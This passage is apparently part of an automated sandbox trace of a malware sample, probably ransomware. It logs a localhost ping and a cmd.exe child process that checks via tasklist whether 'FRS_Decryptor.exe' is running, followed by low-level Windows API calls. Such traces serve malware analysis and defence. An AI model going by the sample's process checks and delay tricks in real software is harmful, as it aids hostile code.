lpName="OutputEncoding", lpBuffer=0x2bf3c4, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0117.012] _fileno (_File=0x76ea4c28) returned 1 [0117.012] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0117.012] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0117.012] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4e8a30 [0117.012] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x4e8a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0117.012] _fileno (_File=0x76ea4c28) returned 1 [0117.012] _write (in: _FileHandle=1, _Buf=0x4e8a30*, _MaxCharCount=0x9 | out: _Buf=0x4e8a30*) returned 9 [0117.012] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.012] _fileno (_File=0x76ea4c28) returned 1 [0117.012] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0117.012] LocalFree (hMem=0x4e8a30) returned 0x0 [0117.012] LocalFree (hMem=0x4f7fd8) returned 0x0 [0117.012] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x2bf498, nSize=0x0, Arguments=0x2bf494 | out: lpBuffer="翘O﹨+⟘\x94䰨盪✨") returned 0x9 [0117.012] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.012] _fileno (_File=0x76ea4c28) returned 1 [0117.012] _get_osfhandle (_FileHandle=1) returned 0x28 [0117.012] GetFileType (hFile=0x28) returned 0x2 [0117.012] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x2bf45c | out: lpMode=0x2bf45c) returned 0 [0117.012] GetLastError () returned 0x6 [0117.012] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x2bf3c0, nSize=0x50 | out: lpBuffer="+✨") returned 0x0 [0117.012] _fileno (_File=0x76ea4c28) returned 1 [0117.012] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0117.012] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0117.012] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x4e8a00 [0117.012] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x4e8a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0117.012] _fileno (_File=0x76ea4c28) returned 1 [0117.012] _write (in: _FileHandle=1, _Buf=0x4e8a00*, _MaxCharCount=0x9 | out: _Buf=0x4e8a00*) returned 9 [0117.012] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.012] _fileno (_File=0x76ea4c28) returned 1 [0117.012] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0117.012] LocalFree (hMem=0x4e8a00) returned 0x0 [0117.012] LocalFree (hMem=0x4f7fd8) returned 0x0 [0117.012] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x2bf420, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0117.012] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x2bf3f4, nSize=0x0, Arguments=0x2bf3f0 | out: lpBuffer="翘O+᧰\x94䰨盪❏") returned 0x5c [0117.012] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.012] _fileno (_File=0x76ea4c28) returned 1 [0117.012] _get_osfhandle (_FileHandle=1) returned 0x28 [0117.012] GetFileType (hFile=0x28) returned 0x2 [0117.012] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x2bf3b8 | out: lpMode=0x2bf3b8) returned 0 [0117.012] GetLastError () returned 0x6 [0117.012] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x2bf31c, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0117.012] _fileno (_File=0x76ea4c28) returned 1 [0117.012] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0117.012] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0117.012] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0x4f80a0 [0117.013] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x4f80a0, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0117.013] _fileno (_File=0x76ea4c28) returned 1 [0117.013] _write (in: _FileHandle=1, _Buf=0x4f80a0*, _MaxCharCount=0x5c | out: _Buf=0x4f80a0*) returned 92 [0117.013] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.013] _fileno (_File=0x76ea4c28) returned 1 [0117.013] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0117.013] LocalFree (hMem=0x4f80a0) returned 0x0 [0117.013] LocalFree (hMem=0x4f7fd8) returned 0x0 [0117.013] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x2bf400, nSize=0x0, Arguments=0x2bf3fc | out: lpBuffer="翘O+ᨧ\x94䰨盪❓") returned 0x61 [0117.013] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.013] _fileno (_File=0x76ea4c28) returned 1 [0117.013] _get_osfhandle (_FileHandle=1) returned 0x28 [0117.013] GetFileType (hFile=0x28) returned 0x2 [0117.013] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x2bf3c4 | out: lpMode=0x2bf3c4) returned 0 [0117.013] GetLastError () returned 0x6 [0117.013] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x2bf328, nSize=0x50 | out: lpBuffer="+❓") returned 0x0 [0117.013] _fileno (_File=0x76ea4c28) returned 1 [0117.013] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0117.013] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0117.013] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0x4f80a8 [0117.013] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x4f80a8, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0117.013] _fileno (_File=0x76ea4c28) returned 1 [0117.013] _write (in: _FileHandle=1, _Buf=0x4f80a8*, _MaxCharCount=0x61 | out: _Buf=0x4f80a8*) returned 97 [0117.013] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0117.013] _fileno (_File=0x76ea4c28) returned 1 [0117.013] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0117.013] LocalFree (hMem=0x4f80a8) returned 0x0 [0117.013] LocalFree (hMem=0x4f7fd8) returned 0x0 [0117.013] IcmpCloseHandle (IcmpHandle=0x4e6b10) returned 1 [0117.013] LocalFree (hMem=0x4ec3b8) returned 0x0 [0117.013] LocalFree (hMem=0x4f5270) returned 0x0 [0117.013] WSACleanup () returned 0 [0117.014] exit (_Code=0) Thread: id = 324 os_tid = 0xb64 Thread: id = 325 os_tid = 0xb58 Process: id = "118" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xb831000" os_pid = "0xb8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6039 start_va = 0x7f0000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 6040 start_va = 0x810000 end_va = 0x811fff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 6041 start_va = 0x820000 end_va = 0x82efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 6042 start_va = 0x830000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 6043 start_va = 0x870000 end_va = 0x96ffff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 6044 start_va = 0x970000 end_va = 0x973fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 6045 start_va = 0x980000 end_va = 0x980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 6046 start_va = 0x990000 end_va = 0x991fff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 6047 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 6048 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6049 start_va = 0x7eb40000 end_va = 0x7eb62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eb40000" filename = "" Region: id = 6050 start_va = 0x7eb63000 end_va = 0x7eb63fff entry_point = 0x0 region_type = private name = "private_0x000000007eb63000" filename = "" Region: id = 6051 start_va = 0x7eb6a000 end_va = 0x7eb6afff entry_point = 0x0 region_type = private name = "private_0x000000007eb6a000" filename = "" Region: id = 6052 start_va = 0x7eb6d000 end_va = 0x7eb6ffff entry_point = 0x0 region_type = private name = "private_0x000000007eb6d000" filename = "" Region: id = 6053 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6054 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6055 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6056 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 6057 start_va = 0xad0000 end_va = 0xadffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 6058 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6059 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6060 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6061 start_va = 0x7f0000 end_va = 0x7fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 6062 start_va = 0x9a0000 end_va = 0xa1dfff entry_point = 0x9a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6063 start_va = 0xc10000 end_va = 0xd0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 6064 start_va = 0xe70000 end_va = 0xe7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 6065 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6066 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6067 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6068 start_va = 0x7ea40000 end_va = 0x7eb3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea40000" filename = "" Region: id = 6069 start_va = 0x800000 end_va = 0x803fff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 6070 start_va = 0xe80000 end_va = 0x1154fff entry_point = 0xe80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6089 start_va = 0x810000 end_va = 0x813fff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Thread: id = 326 os_tid = 0xb88 [0117.042] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0117.042] __set_app_type (_Type=0x1) [0117.042] __p__fmode () returned 0x76ea1768 [0117.042] __p__commode () returned 0x76ea176c [0117.042] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0117.042] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0117.042] GetCurrentThreadId () returned 0xb88 [0117.042] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb88) returned 0x34 [0117.042] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0117.042] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0117.042] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.044] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.044] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x96fe84 | out: phkResult=0x96fe84*=0x0) returned 0x2 [0117.044] VirtualQuery (in: lpAddress=0x96fe93, lpBuffer=0x96fe2c, dwLength=0x1c | out: lpBuffer=0x96fe2c*(BaseAddress=0x96f000, AllocationBase=0x870000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0117.044] VirtualQuery (in: lpAddress=0x870000, lpBuffer=0x96fe2c, dwLength=0x1c | out: lpBuffer=0x96fe2c*(BaseAddress=0x870000, AllocationBase=0x870000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0117.044] VirtualQuery (in: lpAddress=0x871000, lpBuffer=0x96fe2c, dwLength=0x1c | out: lpBuffer=0x96fe2c*(BaseAddress=0x871000, AllocationBase=0x870000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0117.044] VirtualQuery (in: lpAddress=0x873000, lpBuffer=0x96fe2c, dwLength=0x1c | out: lpBuffer=0x96fe2c*(BaseAddress=0x873000, AllocationBase=0x870000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0117.044] VirtualQuery (in: lpAddress=0x970000, lpBuffer=0x96fe2c, dwLength=0x1c | out: lpBuffer=0x96fe2c*(BaseAddress=0x970000, AllocationBase=0x970000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0117.044] GetConsoleOutputCP () returned 0x1b5 [0117.045] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0117.045] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0117.045] _get_osfhandle (_FileHandle=1) returned 0x2b8 [0117.045] SetConsoleMode (hConsoleHandle=0x2b8, dwMode=0x0) returned 0 [0117.045] _get_osfhandle (_FileHandle=1) returned 0x2b8 [0117.045] GetConsoleMode (in: hConsoleHandle=0x2b8, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0117.045] _get_osfhandle (_FileHandle=0) returned 0x24 [0117.045] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0117.045] GetEnvironmentStringsW () returned 0xc140c0* [0117.045] FreeEnvironmentStringsA (penv="=") returned 1 [0117.045] GetEnvironmentStringsW () returned 0xc140c0* [0117.045] FreeEnvironmentStringsA (penv="=") returned 1 [0117.045] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x96edd4 | out: phkResult=0x96edd4*=0x44) returned 0x0 [0117.045] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x96eddc, lpData=0x96ede0, lpcbData=0x96edd8*=0x1000 | out: lpType=0x96eddc*=0x0, lpData=0x96ede0*=0x0, lpcbData=0x96edd8*=0x1000) returned 0x2 [0117.045] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x96eddc, lpData=0x96ede0, lpcbData=0x96edd8*=0x1000 | out: lpType=0x96eddc*=0x4, lpData=0x96ede0*=0x1, lpcbData=0x96edd8*=0x4) returned 0x0 [0117.045] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x96eddc, lpData=0x96ede0, lpcbData=0x96edd8*=0x1000 | out: lpType=0x96eddc*=0x0, lpData=0x96ede0*=0x1, lpcbData=0x96edd8*=0x1000) returned 0x2 [0117.045] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x96eddc, lpData=0x96ede0, lpcbData=0x96edd8*=0x1000 | out: lpType=0x96eddc*=0x4, lpData=0x96ede0*=0x0, lpcbData=0x96edd8*=0x4) returned 0x0 [0117.045] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x96eddc, lpData=0x96ede0, lpcbData=0x96edd8*=0x1000 | out: lpType=0x96eddc*=0x4, lpData=0x96ede0*=0x40, lpcbData=0x96edd8*=0x4) returned 0x0 [0117.045] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x96eddc, lpData=0x96ede0, lpcbData=0x96edd8*=0x1000 | out: lpType=0x96eddc*=0x4, lpData=0x96ede0*=0x40, lpcbData=0x96edd8*=0x4) returned 0x0 [0117.046] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x96eddc, lpData=0x96ede0, lpcbData=0x96edd8*=0x1000 | out: lpType=0x96eddc*=0x0, lpData=0x96ede0*=0x40, lpcbData=0x96edd8*=0x1000) returned 0x2 [0117.046] RegCloseKey (hKey=0x44) returned 0x0 [0117.046] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x96edd4 | out: phkResult=0x96edd4*=0x44) returned 0x0 [0117.046] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x96eddc, lpData=0x96ede0, lpcbData=0x96edd8*=0x1000 | out: lpType=0x96eddc*=0x0, lpData=0x96ede0*=0x40, lpcbData=0x96edd8*=0x1000) returned 0x2 [0117.046] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x96eddc, lpData=0x96ede0, lpcbData=0x96edd8*=0x1000 | out: lpType=0x96eddc*=0x4, lpData=0x96ede0*=0x1, lpcbData=0x96edd8*=0x4) returned 0x0 [0117.046] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x96eddc, lpData=0x96ede0, lpcbData=0x96edd8*=0x1000 | out: lpType=0x96eddc*=0x0, lpData=0x96ede0*=0x1, lpcbData=0x96edd8*=0x1000) returned 0x2 [0117.046] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x96eddc, lpData=0x96ede0, lpcbData=0x96edd8*=0x1000 | out: lpType=0x96eddc*=0x4, lpData=0x96ede0*=0x0, lpcbData=0x96edd8*=0x4) returned 0x0 [0117.046] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x96eddc, lpData=0x96ede0, lpcbData=0x96edd8*=0x1000 | out: lpType=0x96eddc*=0x4, lpData=0x96ede0*=0x9, lpcbData=0x96edd8*=0x4) returned 0x0 [0117.046] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x96eddc, lpData=0x96ede0, lpcbData=0x96edd8*=0x1000 | out: lpType=0x96eddc*=0x4, lpData=0x96ede0*=0x9, lpcbData=0x96edd8*=0x4) returned 0x0 [0117.046] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x96eddc, lpData=0x96ede0, lpcbData=0x96edd8*=0x1000 | out: lpType=0x96eddc*=0x0, lpData=0x96ede0*=0x9, lpcbData=0x96edd8*=0x1000) returned 0x2 [0117.046] RegCloseKey (hKey=0x44) returned 0x0 [0117.046] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa500a0 [0117.046] srand (_Seed=0x5aa500a0) [0117.046] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0117.046] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0117.046] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0117.046] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xc140c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0117.046] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0117.046] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.046] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0117.046] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.046] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0117.046] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0117.046] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0117.046] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0117.046] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0117.046] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0117.046] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0117.046] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0117.046] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0117.047] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x96fbb4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0117.047] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x96fbb4, lpFilePart=0x96fbb0 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x96fbb0*="Desktop") returned 0x1c [0117.047] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0117.047] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x96f930 | out: lpFindFileData=0x96f930) returned 0xc142d8 [0117.047] FindClose (in: hFindFile=0xc142d8 | out: hFindFile=0xc142d8) returned 1 [0117.047] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x96f930 | out: lpFindFileData=0x96f930) returned 0xc142d8 [0117.047] FindClose (in: hFindFile=0xc142d8 | out: hFindFile=0xc142d8) returned 1 [0117.047] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0117.047] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x96f930 | out: lpFindFileData=0x96f930) returned 0xc142d8 [0117.047] FindClose (in: hFindFile=0xc142d8 | out: hFindFile=0xc142d8) returned 1 [0117.047] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0117.047] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0117.047] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0117.047] GetEnvironmentStringsW () returned 0xc16190* [0117.047] FreeEnvironmentStringsA (penv="=") returned 1 [0117.047] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0117.048] GetConsoleOutputCP () returned 0x1b5 [0117.048] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0117.048] GetUserDefaultLCID () returned 0x409 [0117.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, 